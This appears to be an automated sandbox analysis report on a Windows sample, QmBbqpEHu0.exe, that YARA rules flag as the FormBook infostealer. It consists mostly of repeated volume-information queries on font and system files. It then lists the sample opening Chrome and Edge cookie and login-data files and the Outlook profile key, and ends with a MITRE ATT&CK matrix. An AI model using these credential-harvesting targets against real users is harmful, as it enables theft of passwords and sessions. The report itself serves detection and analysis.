                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
